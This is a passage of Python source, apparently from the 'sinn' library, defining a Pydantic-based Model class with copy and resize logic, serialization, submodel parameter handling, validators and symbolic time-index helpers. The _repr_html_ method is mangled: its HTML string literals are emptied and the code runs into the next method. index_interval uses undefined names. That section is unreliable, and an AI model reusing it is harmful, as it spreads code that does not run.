kwargs:\n raise NotImplementedError(\"Arguments to Pydantic's `copy` are \"\n \"not supported by Model's deep copy.\")\n return self.copy_with_resize()\n else:\n m = super().copy(*args, deep=deep, **kwargs)\n m._base_initialize(shallow_copy=not deep)\n # m.initialize()\n return m\n\n def copy_with_resize(self, T: Optional[Union[float,PintValue]]=None,\n _desc: Optional[dict]=None) -> Model:\n \"\"\"\n Return a copy of `self` for which time axes have been resized to\n have length `T`.\n If `T` is `None`, this equivalent to a deep copy.\n \"\"\"\n if _desc is None:\n _desc = ParameterSet(self.dict())\n # Recurse into submodels\n for subnm, submodel in self.nested_models.items():\n _desc[subnm] = submodel.copy_with_resize(T, _desc[subnm])\n for low_hist, high_hist in _desc['connections'].get(subnm, {}).items():\n _desc[high_hist] = getattr(_desc[subnm], low_hist)\n del _desc['connections'] # No longer needed, and not in format expected by initializer\n # Set history length to T\n if T is not None:\n time = self.time\n tmax = (mtb.units.ensure_units(time.unit, time.t0)\n + mtb.units.ensure_units(time.unit, T))\n _desc['time'] = self.time.resize(max=tmax)\n for hnm, h in self.nonnested_histories.items():\n try:\n hdesc = _desc[hnm]\n except KeyError:\n continue\n else:\n if isinstance(hdesc, History):\n # We end up here with connected hists, since their desc has\n # already been replaced by a History in the lower model\n assert abs(hdesc.time.max - tmax.magnitude) <= hdesc.time.dt, \\\n f\"Error copying model: time axis for history {hdesc.name} was not set properly.\"\n continue\n # Set time axis to length T\n hdesc['time'] = h.time.resize(max=tmax)\n # Truncate data if it exceeds time axis\n hdesc['data'] = hdesc['data'].copy()[:hdesc['time'].padded_length]\n # Model initializer requires already instantiated parameter sets\n _desc['params'] = self.Parameters(**_desc['params'])\n # Instantiate the model\n return self.__class__(**_desc)\n\n # TODO: Return views (first requires History.numeric to return DataView)\n # TODO: When doing this, also search for comments \"TODO:Numeric\"\n @property\n def numeric(self):\n \"\"\"\n Copy the model, setting each history to be numeric (i.e. non-symbolic).\n\n .. Caution:: At present, converting from a symbolic to a numeric model\n will copy histories, and therefore integration functions will no\n longer work.\n The plan is eventually for `numeric` to return a view, which would\n make it very cheap and also preserve integration.\n \"\"\"\n if not self._numeric:\n update = {hnm: h.numeric for hnm, h in self.nonnested_histories.items()}\n for subnm, submodel in self.nested_models.items():\n update[subnm] = submodel.numeric\n self._numeric = self.copy(update=update)\n return self._numeric\n\n def dict(self, *args, exclude=None, **kwargs):\n # Remove pending update functions from the dict – they are only used\n # to pass information from the metaclass __new__ to the class __init__,\n # and at this point already attached to the histories. Moreover, they\n # are already included in the serialization of HistoryUpdateFunctions\n exclude = add_exclude_mask(\n exclude,\n {attr for attr, value in self.__dict__.items()\n if isinstance(value, PendingUpdateFunction)}\n )\n # To deal with submodels which are initially unknown, we may assign a\n # new concrete Parameters class to self.Parameters (see `SubmodelParams`\n # and `update_parameters_type()`). This class is recreated during\n # deserialization (as long as a 'Parameters' argument is not present),\n # so we exclude it from export\n exclude = add_exclude_mask(exclude, {\"Parameters\"})\n # When serialized, HistoryUpdateFunctions include the namespace.\n # Remove this, since it is the same as `self`, and inserts a circular\n # dependence.\n hists = {attr: hist for attr,hist in self.__dict__.items()\n if isinstance(hist, History)}\n # TODO: Any way to assert the integrity of the namespace ? We would\n # to execute the assertion below, but during a shallow copy, a\n # 2nd model is created with the same histories; since `namespace`\n # can't point to both, the assertion fails.\n # assert all(h.update_function.namespace is self\n # for h in hists.values())\n excl_nmspc = {attr: {'update_function': {'namespace'}}\n for attr in hists}\n # Remove connected objects which are actually part of another submodel\n excl_conn = {conn_obj: ... for conn_obj in self.connections.values()}\n exclude = add_exclude_mask(exclude, {**excl_nmspc, **excl_conn})\n # Proceed with parent's dict method\n obj = super().dict(*args, exclude=exclude, **kwargs)\n # Add the model name\n obj['ModelClass'] = mtb.iotools.find_registered_typename(self)\n\n return obj\n\n @classmethod\n def parse_obj(cls, obj):\n # Add `initializer` keyword arg to skip initialization\n if 'initializer' not in obj:\n obj['initializer'] = 'do not initialize'\n m = super().parse_obj(obj)\n return m\n\n def update_parameters_type(self):\n \"\"\"\n Replace the placeholder `SubmodelParams` by the actual `Parameters`\n types used by submodels. This must be done after the type of the\n submodel is known (which currently is known only after instantiation,\n since we don't support true generic types for submodels).\n \"\"\"\n global _concrete_parameter_classes\n\n subparams = {submodelname: submodel.Parameters\n for submodelname, submodel in self.nested_models.items()}\n param_type_key = (type(self), tuple(subparams.values()))\n if param_type_key not in _concrete_parameter_classes:\n missing = set(subparams) - set(self.Parameters.__fields__)\n if missing:\n raise RuntimeError(\n \"The following submodels have no matching entry under \"\n f\"in {type(self).__name__}'s Parameters: {missing}.\")\n for subname, truetype in subparams.copy().items():\n basetype = self.Parameters.__fields__[subname].type_\n if not isinstance(basetype, type):\n raise TypeError(f\"{basetype} should be a type.\")\n if basetype is truetype:\n # No need to replace this type\n del subparams[subname]\n elif not issubclass(basetype, SubmodelParams):\n submodel = self.nested_models[subname]\n raise TypeError(\n f\"Attempting to instantiate model {type(self).__name__} \"\n f\"with submodel {subname} of type {type(submodel)}, \"\n f\"but {type(self).__name__}.Parameters.{subname} expects \"\n f\"{basetype}.\")\n if subparams:\n new_name = (\n f\"{self.Parameters.__qualname__}\"\n f\"[{', '.join(T.__qualname__ for T in param_type_key[1])}]\")\n new_param_type = type(new_name, (self.Parameters,),\n {'__annotations__': subparams})\n else:\n # There actually aren't any SubmodelParams to replace\n new_param_type = self.Parameters\n _concrete_parameter_classes[param_type_key] = new_param_type\n else:\n new_param_type = _concrete_parameter_classes[param_type_key]\n self.Parameters = new_param_type\n self.params = new_param_type.parse_obj(self.params)\n\n def set_submodel_params(self):\n \"\"\"\n Keep submodel parameters in sync with the container model.\n This method has no effect if there are no submodels.\n\n This method has the following effect (`submodel.params` is the\n parameter set of the submodel, and `model.subparams` is the\n corresponding subset of parameters of the container model)::\n\n params_values = submodel.Parameters(model.subparams).get_values()\n submodel.params._set_values(param_values)\n model.subparams = submodel.params\n\n The reasoning is as follows:\n\n - We normally set parameter values with `model.params._set_values(value\n dict)`. The values then need to be propagated to the matching\n parameters of submodels.\n - submodel.Parameters may implement validation or normalization, which\n the model expects to be pre-applied to its parameter set.\n - Theano graphs will depend submodel.params, so\n a) we don't want to change the identity of those variables\n b) we want `model.subparams` and `submodel.params` to point to the\n same instances, so that either can be used in a graph.\n \"\"\"\n for submodelname, submodel in self.nested_models.items():\n subparams = getattr(self.params, submodelname)\n # Apply submodel's Parameters validator\n subparam_vals = submodel.Parameters.parse_obj(subparams).get_values()\n # Transfer parameter values to submodel\n submodel.params._set_values(subparam_vals)\n # Replace container parameter by corresponding instances of submodel\n for subθname, θ in submodel.params:\n assert subθname in subparams.__dict__, (\n f\"Subparameter set for submodel '{submodelname}' does not contain a parameter '{subθname}'.\")\n setattr(subparams, subθname, θ)\n # Update the variable name to include the parent model.\n # (with a guard in case we run this twice)\n if hasattr(θ, 'name') and submodelname not in θ.name:\n # (There are ways the test above can fail (e.g. if the\n # parameter's name is the same as the submodel's), but\n # those seem quite unlikely.\n θ.name = submodelname + \".\" + θ.name\n\n def _base_initialize(self,\n shallow_copy: bool=False,\n update_functions: Optional[dict]=None):\n \"\"\"\n Collects initialization that should be done in __init__, copy & parse_obj.\n\n Both arguments are meant for internal use and documented with comments\n in the source code.\n \"\"\"\n self.update_parameters_type()\n self.set_submodel_params()\n\n self._derivatives_view = DerivativesView(self)\n\n if update_functions is not None:\n # 1) update_functions should be a dict, and will override update function\n # defs from the model declaration.\n # This is used when deserializing a model; not really intended as a\n # user-facing option.\n # 2) Add @updatefunction decorator to those recognized by function deserializer\n # To avoid user surprises, we cache the current state of\n # HistoryUpdateFunction._deserialization_locals, update the variable,\n # then return to the original state once we are done\n # Remark: For explicitly passed update functions, we don't use the\n # 'PendingUpdateFunction' mechanism, so in fact\n # we just replace @updatefunction by an idempotent function.\n def idempotent(hist_nm, inputs=None):\n def dec(f):\n return f\n return dec\n # Stash _deserialization_locals\n stored_locals = HistoryUpdateFunction._deserialization_locals\n # Insert substitute @updatefunction decorator\n if 'updatefunction' not in HistoryUpdateFunction._deserialization_locals:\n HistoryUpdateFunction._deserialization_locals = HistoryUpdateFunction._deserialization_locals.copy()\n HistoryUpdateFunction._deserialization_locals['updatefunction'] = idempotent\n # Attach all explicitly passed update functions\n for upd_fn_key, upd_fn in update_functions.items():\n if upd_fn is None:\n continue\n hist_name, method_name = upd_fn_key.rsplit('.', 1)\n hist = getattr(self, hist_name)\n ns = upd_fn.get('namespace', self)\n if ns is not self:\n raise ValueError(\n \"Specifying the namespace of an update function is \"\n \"not necessary, and if done, should match the model \"\n \"instance where it is defined.\")\n upd_fn['namespace'] = self\n if method_name == \"update_function\":\n hist._set_update_function(HistoryUpdateFunction.parse_obj(upd_fn))\n elif method_name == \"range_update_function\":\n hist._set_range_update_function(HistoryUpdateFunction.parse_obj(upd_fn))\n else:\n raise ValueError(f\"Unknown update function '{method_name}'. \"\n \"Recognized values: 'update_function', 'range_update_function'.\")\n # Reset deserializaton locals\n HistoryUpdateFunction._deserialization_locals = stored_locals\n\n # Otherwise, create history updates from the list of pending update\n # functions created by metaclass (don't do during shallow copy – histories are preserved then)\n if not shallow_copy:\n for obj in self._pending_update_functions:\n if obj.hist_nm in update_functions:\n # Update function is already set\n continue\n hist = getattr(self, obj.hist_nm)\n hist._set_update_function(HistoryUpdateFunction(\n namespace = self,\n func = obj.fn, # HistoryUpdateFunction ensures `self` points to the model\n inputs = obj.inputs,\n # parent_model = self\n ))\n self._pending_update_functions = {}\n object.__setattr__(self, 'graph_cache',\n GraphCache('.sinn.graphcache/models', type(self),\n modules=('sinn.models',)))\n object.__setattr__(self, 'compile_cache',\n CompiledGraphCache('.sinn.graphcache/models.compilecache'))\n # TODO: Add other dependencies within `sinn.models` ?\n # object.__setattr__(self, '_advance_updates', {})\n # object.__setattr__(self, '_compiled_advance_fns', {})\n # Keys of these dictionary are tuples of histories passed to `integrate(histories=…)`,\n # i.e. extra histories to integrate along with the state.\n # Values of the first are update dictionaries\n # Values of the second are compiled Theano functions.\n # # Create symbolic variables for batches\n # if shim.cf.use_theano:\n # # # Any symbolic function on batches should use these, that way\n # # # other functions can retrieve the symbolic input variables.\n # start = np.array(1).astype(self.tidx_dtype)\n # object.__setattr__(self, 'batch_start_var',\n # shim.shared(start, name='batch_start'))\n # # # Must be large enough so that test_value slices are not empty\n # # size = np.array(2).astype(self.tidx_dtype)\n # # object.__setattr__(self, 'batch_size_var',\n # # shim.shared(size, name='batch_size'))\n # # # # Must be large enough so that test_value slices are not empty\n\n # Set the value of `connections` so that it reflects actual connections\n # TODO: Put in a root_validator (requires `nested_models` which works as class method)\n already_seen = {} # Keeps track of histories that have been seen\n conn_objs = {} # Connection pairs for objects in different submodels\n # Order: lower model.obj name : upper model.obj name,\n # where the \"lower\" model is the one which can be instantiated first\n # NB: The order in which we iterate over nested_models is set by\n # the order in which submodels are defined in the class\n for subnm, submodel in self.nested_models.items():\n for objnm, obj in ChainMap(submodel.nested_histories_with_repeats,\n submodel.nested_rngs_with_repeats).items():\n if id(obj) in already_seen:\n if already_seen[id(obj)] in conn_objs:\n logger.warning(\"Connecting a history to more than one \"\n \"other history is likely unsafe. The \"\n \"following history name will be lost: \"\n f\"{subnm}.{objnm}.\")\n conn_objs[already_seen[id(obj)]] = f\"{subnm}.{objnm}\"\n else:\n already_seen[id(obj)] = f\"{subnm}.{objnm}\"\n self.connections = conn_objs\n\n @abc.abstractmethod\n def initialize(self, initializer: Any=None):\n \"\"\"\n Models must define an `initialize` method. This is where you can add\n padding to histories, pre-compute kernels, etc. – anything which should\n be done whenever parameters changed.\n\n It takes one optional keyword argument, `initializer`, which can be of\n any form; the model will accept an `initializer` argument at\n instantiation and pass it along to this method.\n This argument can be e.g. a string flag, to indicate one of multiple\n initialization protocols, or a dictionary with multiple initialization\n parameters.\n\n .. important:: Any left-padded history should be filled up to -1 after\n a call to `initialize`.\n\n Arguably this could be implemented as a `root_validator`, but for at\n least for now having a method with exactly this name is required.\n \"\"\"\n pass\n\n\n # @root_validator\n # def check_same_dt(cls, values):\n # hists = [h for h in values if isinstance(h, History)]\n # if any(h1.dt != h2.dt for h1,h2 in zip(hists[:-1], hists[1:])):\n # steps = \", \".join(f\"{str(h)} (dt={h.dt})\" for h in hists)\n # raise ValueError(\n # f\"Histories do not all have the same time step.\\n{steps}\")\n # return values\n\n @root_validator\n def consistent_times(cls, values):\n time = values.get('time', None)\n hists = (v for v in values if isinstance(v, History))\n if time is not None:\n for hist in hists:\n if not time.Index.is_compatible(hist.time.Index):\n raise ValueError(\n \"History and model have incompatible time indexes.\\n\"\n f\"History time index: {hist.time}\\n\"\n f\"Model time index: {time}\")\n return values\n\n # Called by validators in model implementations\n @classmethod\n def check_same_shape(cls, hists):\n if any(h1.shape != h2.shape for h1,h2 in zip(hists[:-1], hists[1:])):\n shapes = \", \".join(f\"{str(h)} (dt={h.shape})\" for h in hists)\n raise ValueError(\n f\"Histories do not all have the same time shape.\\n{shapes}\")\n return None\n\n @root_validator\n def required_rngs_exist(cls, values):\n \"\"\"\n Check that all required random number generators (rngs) are specified.\n This function is just a sanity check: it only ensures that the RNGs\n are not None, if any of the outputs are uncomputed.\n \"\"\"\n hists = values.get('histories', None)\n if hists is None: return values\n for h in hists:\n input_rng = [inp for inp in h.update_function.inputs\n if isinstance(inp, mtb.typing.AnyRNG)]\n if len(input_rng) > 0:\n Model._required_rngs_exist(h, input_rng)\n return values\n\n @staticmethod\n def _required_rngs_exist(outputs, rngs):\n \"\"\"\n Utility function for `required_rngs_exist`.\n\n Parameters\n ----------\n outputs: History\n Can also be a list of Histories\n rngs: random stream, or list of random streams\n The random stream(s) required to generate the histories in\n `outputs`\n\n Raises\n ------\n ValueError:\n If at least one RNG is `None` and at least one of the `outputs`\n is both unlocked and not fully computed.\n\n Warnings\n -------\n UserWarning:\n If all histories are already computed but an RNG is specified,\n since in this case the RNG is not used.\n \"\"\"\n if isinstance(outputs, History):\n outputs = [outputs]\n else:\n if not all(isinstance(output, History) for output in outputs):\n raise AssertionError(\"Model.required_rngs_exist: not all listed outputs \"\n f\"are histories.\\nOutputs: {outputs}.\")\n try:\n len(rngs)\n except TypeError:\n rngs = [rngs]\n\n # if any( not shim.isshared(outhist._sym_data) for outhist in outputs ):\n # # Bypass test for Theano data\n # return\n\n unlocked_hists = [h for h in outputs if not h.locked]\n hists_with_missing_rng = []\n hists_with_useless_rng = []\n for h in outputs:\n hinputs = h.update_function.inputs\n if not h.locked and h.cur_tidx < h.tnidx:\n missing_inputs = \", \".join(\n nm for nm, inp in zip(\n h.update_function.input_names, hinputs)\n if inp is None)\n if len(missing_inputs) > 0:\n hists_with_missing_rng.append(f\"{h.name}: {missing_inputs}\")\n else:\n useless_rng = \", \".join(\n nm for nm, inp in zip(\n h.update_function.input_names, hinputs)\n if inp is shim.config.RNGTypes)\n if len(useless_rng) > 0:\n hists_with_useless_rng.append(f\"{h.name}: {useless_rng}\")\n if len(hists_with_missing_rng):\n missing = \"\\n\".join(hists_with_missing_rng)\n raise ValueError(\n \"The following histories are missing the following inputs:\\n\"\n + missing)\n if len(hists_with_useless_rng):\n useless = \"\\n\".join(hists_with_missing_rng)\n warn(\"The random inputs to the following histories will be \"\n \"ignored, since the histories are already computed:\\n\"\n \"(hist name: random input)\\n\" + useless)\n\n # ==========================================\n # Specializations of standard dunder methods\n # ==========================================\n\n def __str__(self):\n name = self.name\n return \"Model '{}' (t0: {}, tn: {}, dt: {})\" \\\n .format(name, self.t0, self.tn, self.dt)\n\n def __repr__(self):\n return f\"<{str(self)}>\"\n\n def _repr_html_(self):\n summary = self.get_summary()\n topdivline = '
'\n modelline = f'

Model {summary.model_name}'\n if isinstance(self, Model): # Eventually we want to be able to be able to call this on the class\n modelline += f' (t0: {self.t0}, tn: {self.tn}, dt: {self.dt})'\n modelline += '

'\n topulline = '
    '\n stateline = '
  • State variables: '\n stateline += ', '.join([f'{v}' for v in summary.state_vars])\n stateline += '
  • '\n paramblock = '
  • Parameters\\n
      \\n'\n if isinstance(summary.params, IndexableNamespace):\n for name, val in summary.params:\n paramblock += f'
    • {name}={val}
    • \\n'\n else:\n for name in summary.params:\n paramblock += f'
    • {name}
    • \\n'\n paramblock += '
    \\n
  • '\n updfnblock = \"\"\n for varname, upd_code in summary.update_functions.items():\n updfnblock += f'
  • Update function for {varname}\\n'\n updfnblock += f'
    {upd_code}
    \\n
  • \\n'\n if not summary.nested_models:\n nestedblock = \"\"\n else:\n nestedblock = '
  • Nested models:\\n
      '\n for nestedmodel in summary.nested_models:\n nestedblock += f'
    • {nestedmodel._repr_html_()}
    • '\n nestedblock += '
  • \\n'\n\n return \"\\n\".join([\n topdivline, modelline, topulline, stateline,\n paramblock, updfnblock, nestedblock,\n \"
\", \" str:\n return getattr(self, '__name__', type(self).__name__)\n\n @property\n def nonnested_histories(self) -> Dict[str, History]:\n return {nm: getattr(self, nm) for nm in self._hist_identifiers}\n @property\n def nonnested_history_set(self) -> Set[History]:\n return {getattr(self, nm) for nm in self._hist_identifiers}\n def _nested_histories(self, include_repeats=False) -> Generator[Tuple[str, History]]:\n already_seen = set()\n for hnm, h in self.nonnested_histories.items():\n already_seen.add(id(h))\n yield hnm, h\n for submodel_nm, submodel in self.nested_models.items():\n for hist_nm, hist in submodel._nested_histories(include_repeats):\n if include_repeats or id(hist) not in already_seen:\n already_seen.add(id(hist))\n yield (f\"{submodel_nm}.{hist_nm}\", hist)\n @property\n def nested_histories(self) -> Dict[str,History]:\n \"\"\"\n Return the model's histories as {name: History} pairs, with the names\n of nested histories prefixed by the their submodel name: \"{submodel}.{name}\".\n Histories shared between submodels are returned only once.\n \"\"\"\n return dict(self._nested_histories())\n # **{f\"{submodel_nm}.{hist_nm}\": hist\n # for submodel_nm, submodel in self.nested_models.items()\n # for hist_nm, hist in submodel.nested_histories.items()}}\n @property\n def nested_histories_with_repeats(self) -> Dict[str,History]:\n \"\"\"\n Return the model's histories as {name: History} pairs, with the names\n of nested histories prefixed by the their submodel name: \"{submodel}.{name}\".\n Histories shared between submodels are returned multiple times.\n \"\"\"\n return dict(self._nested_histories(include_repeats=True))\n @property\n def history_set(self) -> Set[History]:\n return set(chain(self.nonnested_history_set,\n *(m.history_set for m in self.nested_models_list)))\n @property\n def nonnested_kernels(self) -> Dict[str, Kernel]:\n return {nm: getattr(self, nm) for nm in self._kernel_identifiers}\n @property\n def nonnested_kernel_list(self) -> List[Kernel]:\n return [getattr(self, nm) for nm in self._kernel_identifiers]\n @property\n def kernel_list(self) -> List[Kernel]:\n return list(chain(self.nonnested_kernel_list,\n *(m.kernel_list for m in self.nested_models_list)))\n @property\n def nested_models(self) -> Dict[str, Model]:\n return {nm: getattr(self, nm) for nm in self._model_identifiers}\n @property\n def nested_models_list(self) -> List[Model]:\n return [getattr(self, nm) for nm in self._model_identifiers]\n\n @property\n def derivatives(self) -> DerivativesView:\n return self._derivatives_view\n\n @property\n def initial_value(self) -> Dict[str,Tensor]:\n return {nm: h[:self.t0] for nm, h in self.nested_histories.items()}\n\n @property\n def t0(self):\n return self.time.t0\n @property\n def tn(self):\n return self.time.tn\n @property\n def t0idx(self):\n return self.time.t0idx\n @property\n def tnidx(self):\n return self.time.tnidx\n @property\n def tidx_dtype(self):\n return self.time.Index.dtype\n @property\n def dt(self):\n return self.time.dt\n\n @property\n def statehists(self) -> utils.FixedGenerator:\n nested_len = sum(len(m.statehists) for m in self.nested_models_list)\n return utils.FixedGenerator(\n chain(\n (getattr(self, varname) for varname in self.State.__annotations__),\n *(m.statehists for m in self.nested_models_list)),\n nested_len + len(self.State.__annotations__) )\n\n @property\n def unlocked_statehists(self) -> Generator[History]:\n return (h for h in self.statehists if not h.locked)\n\n @property\n def locked_statehists(self) -> Generator[History]:\n return (h for h in self.statehists if h.locked)\n\n @property\n def locked_histories(self) -> Generator[History]:\n return (h for h in self.history_set if h.locked)\n\n @property\n def unlocked_histories(self) -> Generator[History]:\n return (h for h in self.history_set if not h.locked)\n\n @property\n def nonstatehists(self) -> utils.FixedGenerator:\n statehists = list(self.statehists)\n return utils.FixedGenerator(\n (h for h in self.history_set if h not in statehists),\n len(self.history_set) - len(self.statehists) )\n\n @property\n def unlocked_nonstatehists(self):\n return (h for h in self.nonstatehists if not h.locked)\n\n @property\n def rng_inputs(self) -> List[mtb.typing.AnyRNG]:\n \"\"\"\n Return a list of all RNGs on which _unlocked_ histories depend.\n RNGs which only appear as inputs for _locked_ histories are excluded;\n thus the returned list can usually be assumed to be those RNGs which\n would be triggered by integration, with the current lock statuses.\n \"\"\"\n rng_inputs = []\n for h in self.unlocked_histories:\n for nm in h.update_function.input_names:\n inp = getattr(h.update_function.namespace, nm)\n if (isinstance(inp, shim.config.RNGTypes)\n and inp not in rng_inputs):\n rng_inputs.append(inp)\n return rng_inputs\n\n @property\n def nonnested_rngs(self) -> Dict[str, mtb.typing.AnyRNG]:\n d = {}\n for attr in self.__fields__:\n obj = getattr(self, attr, None)\n if isinstance(obj, shim.config.RNGTypes):\n d[attr] = obj\n return d\n def _nested_rngs(self, include_repeats=False) -> Generator[Tuple[str,mtb.typing.AnyRNG]]:\n already_seen = set()\n for rng_nm, rng in self.nonnested_rngs.items():\n already_seen.add(id(rng))\n yield rng_nm, rng\n for submodel_nm, submodel in self.nested_models.items():\n for rng_nm, rng in submodel._nested_rngs(include_repeats):\n if include_repeats or id(rng) in already_seen:\n already_seen.add(id(rng))\n yield (f\"{submodel_nm}.{rng_nm}\", rng)\n @property\n def nested_rngs(self) -> Dict[str, mtb.typing.AnyRNG]:\n return dict(self._nested_rngs())\n # **{f\"{submodel_nm}.{rng_nm}\": rng\n # for submodel_nm, submodel in self.nested_models.items()\n # for rng_nm, rng in submodel.nested_rngs.items()}}\n @property\n def nested_rngs_with_repeats(self) -> Dict[str, mtb.typing.AnyRNG]:\n return dict(self._nested_rngs(include_repeats=True))\n\n @property\n def rng_hists(self) -> List[History]:\n \"\"\"\n Return a list of stochastic histories (those with an RNG as input.)\n \"\"\"\n rng_hists = []\n for h in self.unlocked_histories:\n for nm in h.update_function.input_names:\n inp = getattr(h.update_function.namespace, nm)\n if isinstance(inp, shim.config.RNGTypes):\n rng_hists.append(h)\n break\n return rng_hists\n\n def get_min_tidx(self, histories: Sequence[History]):\n \"\"\"\n Return the earliest time index for which all histories are computed.\n \"\"\"\n try:\n return min(h.cur_tidx.convert(self.time.Index)\n for h in histories)\n except IndexError as e:\n raise IndexError(\n \"Unable to determine a current index for \"\n f\"{self.name}. This usually happens accessing \"\n \"`cur_tidx` before a model is initialized.\") from e\n\n @property\n def cur_tidx(self):\n \"\"\"\n Return the earliest time index for which all state histories are computed.\n \"\"\"\n if not self.statehists:\n raise RuntimeError(\"`cur_tidx` is undefined for a model with no \"\n \"state histories, since any time point can be \"\n \"computed at any time.\\nIf you need an anchor \"\n \"time point for building a computational graph, \"\n \"use `num_tidx` instead.\")\n return self.get_min_tidx(self.statehists)\n\n @property\n def cur_t(self):\n \"\"\"\n Returns the time up to which all state histories are computed computed.\n Equivalent to `self.time[self.cur_tidx]`.\n \"\"\"\n return self.time[self.cur_tidx]\n\n # Symbolic variables for use when compiling unanchored functions\n # Building as `shim.tensor(np.array(...))` assigns a test value to the\n # variable, allowing models to work with compute_test_value != 'ignore'\n # (As is required for PyMC3)\n # Stop test value should be at least 2 more than _curtidx, because scan runs\n # from `_curtidx + 1` to `stoptidx`.\n @property\n def curtidx_var(self):\n \"\"\"\n Return a purely symbolic variable intended to represent the current\n time index of the model (i.e. all state histories have been computed\n up to this point inclusively).\n\n Always returns the same object, so that it can be substituted in\n computational graphs.\n\n .. Note:: Like all user-facing indices, this should be treated as an\n *axis index*, not a data index.\n \"\"\"\n # It's important to guard with hasattr, because `self.curtidx_var`\n # must always return the same variable.\n if not hasattr(self, '_curtidx_var'):\n object.__setattr__(self, '_curtidx_var',\n shim.tensor(np.array(1, dtype=self.tidx_dtype),\n name='curtidx (model)'))\n return self._curtidx_var\n @property\n def stoptidx_var(self):\n \"\"\"\n Return a purely symbolic variable intended to represent the end point\n (exclusive) of a computation.\n\n Always returns the same object, so that it can be substituted in\n computational graphs.\n\n .. Note:: Like all user-facing indices, this should be treated as an\n *axis index*, not a data index.\n \"\"\"\n if not hasattr(self, '_stoptidx_var'):\n object.__setattr__(self, '_stoptidx_var',\n shim.tensor(np.array(3, dtype=self.tidx_dtype),\n name='stoptidx (model)'))\n return self._stoptidx_var\n @property\n def batchsize_var(self):\n \"\"\"\n Return a purely symbolic variable intended to represent the batch size.\n This is sometimes more convenient in functions than specifying the end\n point.\n\n Always returns the same object, so that it can be substituted in\n computational graphs.\n \"\"\"\n if not hasattr(self, '_batchsize_var'):\n object.__setattr__(self, '_batchsize_var',\n shim.tensor(np.array(2, dtype=self.tidx_dtype),\n name='batchsize (model)'))\n return self._batchsize_var\n\n def get_num_tidx(self, histories: Sequence[History]):\n \"\"\"\n A shared variable corresponding to the current time point of\n the model. This is only defined if all histories are synchronized.\n (*Locked* histories need not be synchronized, but must be computed at\n least as far as unlocked histories.)\n\n Special case: if all listed histories are locked (or `histories` is\n empty), then a tidx corresponding to `self.t0idx` is returned.\n Rationale: the time point of locked histories is meaningless, since\n they cannot be updated, and it makes no sense to force them to be\n synchronized. The only thing we expect is that whatever value is\n returned by `num_tidx` is already computed for all locked histories.\n Since the purpose of this method is to return a time index suitable\n for constructing a graph, if there are no histories to update, the time\n point itself does not matter. Thus we return the index corresponding to\n t0, since this requires the least data.\n\n Always returns the same object, so that it can be substituted in\n computational graphs.\n\n Raises `RuntimeError` if histories are not all synchronized.\n\n .. WARNING::\n This does not return an AxisIndex, so always wrap this variable\n with [model].time.Index or [model].time.Index.Delta before using\n it to index into a history.\n\n .. Warning::\n Each computational graph should only involve calls to `get_num_tidx`\n with the same list of histories. Different lists of histories\n may return different objects. Different objects will also be\n returned if the lock status of some histories changes.\n\n .. Dev note::\n If we can find a way to make SymbolicAxisIndexMeta._instance_plain\n return the original underlying symbolic variable (the one which\n appears in graphs), I will gladly change this method to return a\n proper symbolic index.\n\n Parameters\n ----------\n histories: Set of histories\n \"\"\"\n # TODO: Since we assert that all unlocked state histories are\n # synchronized, I'm not sure how useful it is to also allow `histories`\n # to be specified (we could just always use unlocked state hists)\n if not self.histories_are_synchronized():\n L = max(len(hnm) for hnm in self.nested_histories)\n tidcs = \"\\n\".join(f\"{hnm:<{L}}: {h.cur_tidx.convert(self.time.Index)}\"\n for hnm, h in self.nested_histories.items()\n if not h.locked)\n raise RuntimeError(\n f\"Unlocked histories for the {self.name} model are not all \"\n \"computed up to the same point, or further than some locked \"\n \"histories. The compilation of the model's integration function \"\n \"is ill-defined in this case.\\nTime indexes for unlocked \"\n f\"histories (converted to model's time axis):\\n{tidcs}\")\n unlocked_histories = [h for h in histories if not h.locked]\n if unlocked_histories:\n key = tuple(id(h) for h in unlocked_histories)\n tidx = self.get_min_tidx(unlocked_histories)\n else:\n # DEV NOTE: I put this restriction here because all current use cases\n # for `num_tidx` are to index into the history, hence we need\n # a value at which the histories are computed. But theoretically\n # it could also return a negative index if nothing is computed,\n # like History.cur_tidx does. The issue then is what is the most\n # sensible thing to do if histories have different left padding.\n _locked_histories = list(self.locked_histories) # Consume generator\n if _locked_histories:\n assert self.get_min_tidx(_locked_histories) >= self.t0idx, \\\n \"`get_num_tidx` requires histories be computed at least up to `t0idx`\"\n key = ()\n tidx = self.t0idx\n if key not in self._num_tidx_objs:\n self._num_tidx_objs[key] = shim.shared(\n np.array(tidx, dtype=self.tidx_dtype), f\"t_idx ({self.name})\")\n else:\n self._num_tidx_objs[key].set_value(tidx)\n return self._num_tidx_objs[key]\n\n @property\n def num_tidx(self):\n \"\"\"\n Return a shared variable suitable to use as an anchor time index for\n building computational graphs.\n \"\"\"\n return self.get_num_tidx(self.statehists)\n\n def histories_are_synchronized(self):\n \"\"\"\n Return True if all unlocked state hists are computed to the same time\n point, and all locked histories at least up to that point.\n \"\"\"\n try:\n tidcs = [h.cur_tidx.convert(self.time.Index)\n for h in self.unlocked_statehists]\n except IndexError:\n # If conversion fails, its because the converted index would be out\n # of the range of the new hist => hists clearly not synchronized\n return False\n locked_tidcs = [h.cur_tidx.convert(self.time.Index)\n for h in self.locked_statehists]\n if len(tidcs) == 0:\n return True\n earliest = min(tidcs)\n latest = max(tidcs)\n if earliest != latest:\n return False\n elif any(ti < earliest for ti in locked_tidcs):\n return False\n else:\n return True\n\n def get_tidx(self, t, allow_rounding=False):\n # Copied from History.get_tidx\n if self.time.is_compatible_value(t):\n return self.time.index(t, allow_rounding=allow_rounding)\n else:\n # assert self.time.is_compatible_index(t)\n assert shim.istype(t, 'int')\n if (isinstance(t, sinn.axis.AbstractAxisIndexDelta)\n and not isinstance(t, sinn.axis.AbstractAxisIndex)):\n raise TypeError(\n \"Attempted to get the absolute time index corresponding to \"\n f\"{t}, but it is an index delta.\")\n return self.time.Index(t)\n get_tidx.__doc__ = History.get_tidx.__doc__\n\n def get_tidx_for(self, t, target_hist, allow_fractional=False):\n raise DeprecationWarning(\"Use the `convert` method attached to the AxisIndex.\")\n\n def index_interval(self, Δt, allow_rounding=False):\n return self.time.index_interval(value, value2,\n allow_rounding=allow_rounding,\n cast=cast)\n index_interval.__doc__ = TimeAxis.index_interval.__doc__\n\n def get_time(self, t):\n # Copied from History\n # NOTE: Copy changes to this function in Model.get_time()\n # TODO: Is it OK to enforce single precision ?\n if shim.istype(t, 'int'):\n # Either we have a bare int, or an AxisIndex\n if isinstance(t, sinn.axis.AbstractAxisIndex):\n t = t.convert(self.time)\n elif isinstance(t, sinn.axis.AbstractAxisIndexDelta):\n raise TypeError(f\"Can't retrieve the time 